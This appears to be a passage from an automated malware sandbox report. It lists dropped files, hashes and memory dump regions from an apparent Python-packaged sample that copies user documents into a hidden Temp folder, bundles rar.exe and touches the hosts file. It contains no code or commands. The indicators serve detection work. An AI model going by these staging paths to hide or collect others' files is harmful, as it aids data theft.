bbc1fcb5792f226c82e3e958948cb3c3

SHA1
4d25857bcf0651d90725d4fb8db03ccada6540c3

SHA256
9a36e09f111687e6b450937bb9c8aede7c37d598b1cccc1293eed2342d11cf47

SHA512
3137be91f3393df2d56a3255281db7d4a4dccd6850eeb4f0df69d4c8dda625b85d5634fce49b195f3cc431e2245b8e9ba401baaa08778a467639ee4c1cc23d8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\libssl-1_1.dll

Filesize
204KB

MD5
ad0a2b4286a43a0ef05f452667e656db

SHA1
a8835ca75768b5756aa2445ca33b16e18ceacb77

SHA256
2af3d965863018c66c2a9a2d66072fe3657bbd0b900473b9bbdcac8091686ae1

SHA512
cceb5ec1dd6d2801abbacd6112393fecbf5d88fe52db86cfc98f13326c3d3e31c042b0cc180b640d0f33681bdd9e6a355dc0fbfde597a323c8d9e88de40b37c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\python311.dll

Filesize
1.6MB

MD5
9e985651962ccbccdf5220f6617b444f

SHA1
9238853fe1cff8a49c2c801644d6aa57ed1fe4d2

SHA256
3373ee171db8898c83711ec5067895426421c44f1be29af96efe00c48555472e

SHA512
8b8e68bbe71dcd928dbe380fe1a839538e7b8747733ba2fd3d421ba8d280a11ba111b7e8322c14214d5986af9c52ab0c75288bbb2a8b55612fb45836c56ddc36

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\select.pyd

Filesize
25KB

MD5
27703f9a7c7e90e049d5542fb7746988

SHA1
bc9c6f5271def4cc4e9436efa00f231707c01a55

SHA256
fcc744cfccc1c47f6f918e66cfc1b73370d2cecdb776984fabb638745ebe3a38

SHA512
0875ad48842bbac73e59d4b0b5d7083280bde98336c8856160493cc63f7c3a419f4471f19c8537e5c8515e194c6604f9efa07d9d9af5def2f374406d316436a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\sqlite3.dll

Filesize
610KB

MD5
08ce33649d6822ff0776ede46cc65650

SHA1
941535dabdb62c7ca74c32f791d2f4b263ec7d48

SHA256
48f50e8a693f3b1271949d849b9a70c76acaa4c291608d869efe77de1432d595

SHA512
8398e54645093e3f169c0b128cbeda3799d905173c9cb9548962ecbaf3d305620f0316c7c3f27077b148b8f6d3f6146b81c53b235f04ac54668dab05b929d52f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\unicodedata.pyd

Filesize
295KB

MD5
f86f9b7eb2cb16fb815bb0650d9ef452

SHA1
b9e217146eb6194fc38923af5208119286c365ad

SHA256
b37d56ad48a70b802fb337d721120d753270dbda0854b1bfb600893fb2ce4e7a

SHA512
6c448f6d6c069ba950c555529557f678dfd17c748b2279d5eec530d7eb5db193aa1ca18dd3ce9f5220e8681a0e50b00d7de93c6744476c0e1872dafd9d5de775

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2oczjlwu.jez.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tttmvc0u\tttmvc0u.dll

Filesize
4KB

MD5
f1fd2b5821901d65a558e53680322d64

SHA1
0369fa1d589106eef89afad84e06fde7b9609e22

SHA256
0060aab6d9fa02a76d3ac4b35160d0179ad6396b1efdd1a49b831fdeed7a74e1

SHA512
95aab38ff1a163ba8ed8735aebef676d531a439b55e8fe2738a615ffa28d05d79c8717142916d8811cc6b11c38bdcdf7201162e8f5d3c4aaec0b6a9fd06bcb5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\HideReceive.docx

Filesize
19KB

MD5
543957be64123d7130113e2c774c4e66

SHA1
8c2a5ee2afc4eefefd72cbe6a9158d7da0865cd9

SHA256
987c2359d88c9a7539542dd29b7bb4731fb5e18b951cfc7b9d5dca8d58926f07

SHA512
66d87ecbef5bab76149428ea1504f9016c3828be214b8e0ddca72e76665c9b97a8f69d648c6aaaf88fd412aeb685b324a168c0150b713ffd3bc5c41ddb6e828c

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\ReadWatch.docx

Filesize
15KB

MD5
9378fe1b57b8a29bfcea22071f726803

SHA1
e66a64b4f53bbe2967f33f8e6adbc5ac41cde66e

SHA256
8ae9866e1eae27587444c08bddf534fea99b74b4d70b5208b717c105388fdd1b

SHA512
0aca5669f2a7d816e806d9af24a9529c3ee038f2a676adb441ad4858020d7855e6b9248c4ceef22afa955d12df145406fd7ecaed628e060561293815b870cdcd

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\ResetResize.xlsx

Filesize
14KB

MD5
e78b232385d9a21af691b73cb6964c45

SHA1
9a5026c86cd50e11a1547784cf645e9c195e99b2

SHA256
334eacd973d34f6b6f748caf59703ed7b95a2935e7cada6dfce0b985ab338137

SHA512
1c6c8d83d09b2e79af66e3f15ad38e487ef6f18af211752e5c1bbb5609eface2eb0f5594eba982aa0587e011338e65d0733fadd2b8383d81ddcede87031a2907

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\ConfirmSave.txt

Filesize
230KB

MD5
f8fc4c65bf5c0a16c33ff6961447969f

SHA1
ee7d50c52afde864edb6ec0493ca9fbec1beafed

SHA256
3c87f120a10346ed5d0902a384c67542b5f20799b0238dc815f927fab95c89ba

SHA512
864eb21072537c7ac5822565e00aa90cf4d0d5d4d11602ca0f6f3f7b1e0441cc2d0fd80d5c1065c02da24fa8df206b1f7993dbbb16a8d518b6b2b716e70be2fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\FindExport.doc

Filesize
506KB

MD5
ec58588540f71fa2f76ab9ab9f6218a9

SHA1
2aaf6a93595f06bfd2c7942f1d12fbb1366fd00e

SHA256
c6d42468013e4c89af2866f2a2278cf5ec3cab84f4608a7f8aedb6949f7678fe

SHA512
dfc097b448218e99cb0ef6b7af76660b441df083e40a93b6cc2985a27b01c859dce4a27515ece2408fc330304eb8cf417c00e6ab0aaf96a83911257027176c93

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\SkipCompress.xlsx

Filesize
9KB

MD5
14d52f4e10bff325972c74e30a3b956b

SHA1
b6275e239324da9bbeb5dd3a8bcfdfcc78fd1045

SHA256
586ae897b64569f88119c83bdb5c00efdab1f2c2bac407594a98d435d551a2c0

SHA512
0e30ac643005ce0569ae99f9e24a29635935821bc35bdb060d9df1a68d86f973fe3c4491b6dba357224ccba3bf0eb00b26b6721492f64827084ce7b64e9e58e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\TraceSend.pdf

Filesize
322KB

MD5
62319a7c5dd5a447b7ffa86cacdec506

SHA1
06ad6781bac660b7aa1f88f2c7470ab2c297da15

SHA256
87c85f4a250e258985511ca29e200f80bdce5a2a03dacfd5226f39b8c52af844

SHA512
12dbb422ec964f2fcecae486683a21d6497d740ecc4083095bd111b2c36148e052ba5b10e4fd3031248c00b5c79cdb48e2e3c341860c3b9cd50d6b2e97cf7fb6

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\UnregisterGroup.docx

Filesize
483KB

MD5
c9eb03eaecf84abc2942f50bab6f312b

SHA1
a331722bfbcf2f50b2d9f3aecfce8d78fa9506f7

SHA256
69616fac0d8efee76a053123b567ebe564a441e9c8f0442a9a6c56e686c8a3b7

SHA512
ab5ff4c9939623f76dbd57d36665ff042fd821349ad83ec979af987491042b467d8bb84798fea8d5718410f6aedb8286fe31eccd2071eaf4aac58520e0302e07

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\UpdateExpand.xlsx

Filesize
12KB

MD5
b92bd3400d0cb99ce33d1fdcf176948a

SHA1
f87fc9bd7f0d249fa846b90ef7c8d064f9047356

SHA256
71d8129524492208cf56250a6e3f9bc0332a179817413bca1eaf0582099512b6

SHA512
c9aa6f10b60d31b2093501c3ceb9f7a816869596e932bc242febc98f7fe8f1e11d7cccd0b5277a457084ff0afd05434fa9be884fbd72d3dc4a220333a7034640

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Downloads\BackupExpand.mht

Filesize
1.6MB

MD5
fb9f68801b0cb4f5163888d655fb9978

SHA1
1a34c122e8ce6dc779a6865261786fccab583a4d

SHA256
3ee053072a1e4917d4084da22efe781f360bdb4892a383304575caabe387784c

SHA512
fc6eeac561e6a01795ffdbcb33608a739807861e38e1f8d6b1ebaef1242f0986470c2c8dc0e7ca06789db62e0b126b3532abc3717a815fcef665047abdadcb76

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Downloads\BlockRestore.mp4

Filesize
971KB

MD5
a462a95726d053c9bb48d11d0c41cd96

SHA1
7fd97de939594978efd7168a65cc4161487ae5fe

SHA256
b27af751b935ac666061c166523aa77b2b54cc176fa92026235ff5db4a5dc30b

SHA512
98e2444104c205dc78a578791f2a4ca61b2b3deae6dd215ec4211657e04b9ee70cc5a5a40c0bfca712beef0c8816cc4b276400064cdc40e027894e41d16e21b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Downloads\HideRequest.docx

Filesize
713KB

MD5
aca00e1a9a17343363aaeca335475d4d

SHA1
8391e2116a64f2c6520852ae208b08f0ed66035f

SHA256
cce92a89fe7ba88b985f6b75e8317112cd971536be026f969ece9700145bedd7

SHA512
f1d9f8f04a198f978e1f3c11c9f373337de989a2ca449b51d9ebc62b5e800d8606e240e60c0a0f697eb6c70f815349d873a7778423bda12cef2e3c6c33e43627

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tttmvc0u\CSCF8000EDC678F469F8F3DD18042B5A9A0.TMP

Filesize
652B

MD5
f6a0b59edd9701875cfe5c1c78a06d03

SHA1
179176fc67fd762378959a7eae828a41243c158f

SHA256
855c4664fcd96bcbb217b7ce70232bba7fb9a300e1a62f9b243168b4f49b451d

SHA512
50491e5e4403440e8b98691c364d42c5dfca32c8d5e6ee7cfc16d63d4bd77f1915ffcfd777b01e3fda1eeb5f2758fb4c89aa2887d70f0077a306ecfc3bded236

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tttmvc0u\tttmvc0u.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tttmvc0u\tttmvc0u.cmdline

Filesize
607B

MD5
6178ba4375d770cff2d0b78d3c3a7fe4

SHA1
7cd8e42e0d78b1f3f276ff0d03ea07078612c6d8

SHA256
e59153b3791e7abf3f74faad6af0da140eccaeddce011e12c80a2f6ada6aa026

SHA512
7fe7d4a976b67517220f199c6e652da6e6001f885635c3876bf86e6cd1faf6c4e18f30576aeb06660cd753bc59eb6becbf288cf25071eb0be5572cb299aadb73

Download Submit
memory/3368-45-0x00007FFC229B0000-0x00007FFC229D3000-memory.dmp

Filesize
140KB

Download
memory/3368-58-0x00007FFC1F8F0000-0x00007FFC1F913000-memory.dmp

Filesize
140KB

Download
memory/3368-107-0x00007FFC1EE60000-0x00007FFC1EFD0000-memory.dmp

Filesize
1.4MB

Download
memory/3368-335-0x00007FFC0F650000-0x00007FFC0F9C9000-memory.dmp

Filesize
3.5MB

Download
memory/3368-81-0x00007FFC1F8F0000-0x00007FFC1F913000-memory.dmp

Filesize
140KB

Download
memory/3368-336-0x00007FFC28580000-0x00007FFC2858F000-memory.dmp

Filesize
60KB

Download
memory/3368-70-0x00007FFC0F9D0000-0x00007FFC0FFB9000-memory.dmp

Filesize
5.9MB

Download
memory/3368-71-0x00007FFC229B0000-0x00007FFC229D3000-memory.dmp

Filesize
140KB

Download
memory/3368-337-0x00007FFC229B0000-0x00007FFC229D3000-memory.dmp

Filesize
140KB

Download
memory/3368-73-0x00000236E5750000-0x00000236E5AC9000-memory.dmp

Filesize
3.5MB

Download
memory/3368-74-0x00007FFC0F650000-0x00007FFC0F9C9000-memory.dmp

Filesize
3.5MB

Download
memory/3368-209-0x00007FFC1F8C0000-0x00007FFC1F8EE000-memory.dmp

Filesize
184KB

Download
memory/3368-77-0x00007FFC22AB0000-0x00007FFC22AC4000-memory.dmp

Filesize
80KB

Download
memory/3368-266-0x00000236E5750000-0x00000236E5AC9000-memory.dmp

Filesize
3.5MB

Download
memory/3368-265-0x00007FFC1EDA0000-0x00007FFC1EE58000-memory.dmp

Filesize
736KB

Download
memory/3368-269-0x00007FFC0F650000-0x00007FFC0F9C9000-memory.dmp

Filesize
3.5MB

Download
memory/3368-78-0x00007FFC1FAC0000-0x00007FFC1FACD000-memory.dmp

Filesize
52KB

Download
memory/3368-80-0x00007FFC0F470000-0x00007FFC0F58C000-memory.dmp

Filesize
1.1MB

Download
memory/3368-72-0x00007FFC1EDA0000-0x00007FFC1EE58000-memory.dmp

Filesize
736KB

Download
memory/3368-66-0x00007FFC1F8C0000-0x00007FFC1F8EE000-memory.dmp

Filesize
184KB

Download
memory/3368-64-0x00007FFC25D20000-0x00007FFC25D2D000-memory.dmp

Filesize
52KB

Download
memory/3368-62-0x00007FFC22B90000-0x00007FFC22BA9000-memory.dmp

Filesize
100KB

Download
memory/3368-60-0x00007FFC1EE60000-0x00007FFC1EFD0000-memory.dmp

Filesize
1.4MB

Download
memory/3368-110-0x00007FFC22B90000-0x00007FFC22BA9000-memory.dmp

Filesize
100KB

Download
memory/3368-56-0x00007FFC25040000-0x00007FFC25059000-memory.dmp

Filesize
100KB

Download
memory/3368-54-0x00007FFC1FAD0000-0x00007FFC1FAFD000-memory.dmp

Filesize
180KB

Download
memory/3368-48-0x00007FFC28580000-0x00007FFC2858F000-memory.dmp

Filesize
60KB

Download
memory/3368-284-0x00007FFC229B0000-0x00007FFC229D3000-memory.dmp

Filesize
140KB

Download
memory/3368-283-0x00007FFC0F9D0000-0x00007FFC0FFB9000-memory.dmp

Filesize
5.9MB

Download
memory/3368-298-0x00007FFC0F470000-0x00007FFC0F58C000-memory.dmp

Filesize
1.1MB

Download
memory/3368-289-0x00007FFC1EE60000-0x00007FFC1EFD0000-memory.dmp

Filesize
1.4MB

Download
memory/3368-25-0x00007FFC0F9D0000-0x00007FFC0FFB9000-memory.dmp

Filesize
5.9MB

Download
memory/3368-320-0x00007FFC0F9D0000-0x00007FFC0FFB9000-memory.dmp

Filesize
5.9MB

Download
memory/3368-348-0x00007FFC0F470000-0x00007FFC0F58C000-memory.dmp

Filesize
1.1MB

Download
memory/3368-347-0x00007FFC1FAC0000-0x00007FFC1FACD000-memory.dmp

Filesize
52KB

Download
memory/3368-346-0x00007FFC22AB0000-0x00007FFC22AC4000-memory.dmp

Filesize
80KB

Download
memory/3368-345-0x00007FFC1EDA0000-0x00007FFC1EE58000-memory.dmp

Filesize
736KB

Download
memory/3368-344-0x00007FFC1F8C0000-0x00007FFC1F8EE000-memory.dmp

Filesize
184KB

Download
memory/3368-343-0x00007FFC25D20000-0x00007FFC25D2D000-memory.dmp

Filesize
52KB

Download
memory/3368-342-0x00007FFC22B90000-0x00007FFC22BA9000-memory.dmp

Filesize
100KB

Download
memory/3368-341-0x00007FFC1EE60000-0x00007FFC1EFD0000-memory.dmp

Filesize
1.4MB

Download
memory/3368-340-0x00007FFC1F8F0000-0x00007FFC1F913000-memory.dmp

Filesize
140KB

Download
memory/3368-339-0x00007FFC25040000-0x00007FFC25059000-memory.dmp

Filesize
100KB

Download
memory/3368-338-0x00007FFC1FAD0000-0x00007FFC1FAFD000-memory.dmp

Filesize
180KB

Download
memory/3600-202-0x000002CD64700000-0x000002CD64708000-memory.dmp

Filesize
32KB

Download
memory/3892-82-0x00007FFC0E583000-0x00007FFC0E585000-memory.dmp

Filesize
8KB

Download
memory/3892-92-0x0000017CEFBD0000-0x0000017CEFBF2000-memory.dmp

Filesize
136KB

Download